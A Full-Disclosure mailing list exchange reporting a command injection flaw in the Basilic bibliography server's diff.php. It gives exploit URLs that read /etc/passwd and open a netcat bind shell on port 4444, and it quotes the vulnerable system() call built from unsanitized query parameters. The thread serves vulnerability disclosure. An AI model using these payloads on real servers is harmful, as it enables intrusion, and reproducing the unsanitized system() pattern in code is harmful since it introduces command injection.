Re: [Full-disclosure] Basilic RCE bug

[larry Cashdollar <larry0@xxxxxx>]

<html><body><div>verified, 
http://artis.imag.fr/Software/Basilic/<br><br>http://127.0.0.1/basilic/Config/diff.php?file=%26nc%20-ltp4444%20-e%20/bin/bash&amp;new=1&amp;old=2
 <br><br>for an interactive shell on port 4444.&nbsp; Neat.<br><br>line 39 of 
diff.php is<br><br>system("diff ../$_GET[old]/$_GET[file] 
$_GET[new]/$_GET[file] | sed s%\"&lt;\"%\"\&amp;lt;\"%g | sed 
s%\"&gt;\"%\"\&amp;gt;\"%g");<br><br></div><div><br>On Jun 30, 2012, at 01:45 
PM, m.razavi777@xxxxxxxxx wrote:<br><br><div><blockquote type="cite"><div 
class="msg-quote"><div class="_stretch">Hi<br> Dear Sir<br> <br> Basilic is an 
Automated Bibliography Server for Research Publications Diffusion that use by 
many research center.<br> there is a RCE bug in basilic/Config/diff.php s could 
allow an attacker to run system command in server.<br> sample:<br> <a 
href="http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&amp;new=1&amp;old=2";
 
data-mce-href="http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&amp;new=1&amp;old=2";>http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&amp;new=1&amp;old=2</a><br>
 <br> Regards<br> 
M.Razavi<br></div></div></blockquote></div></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/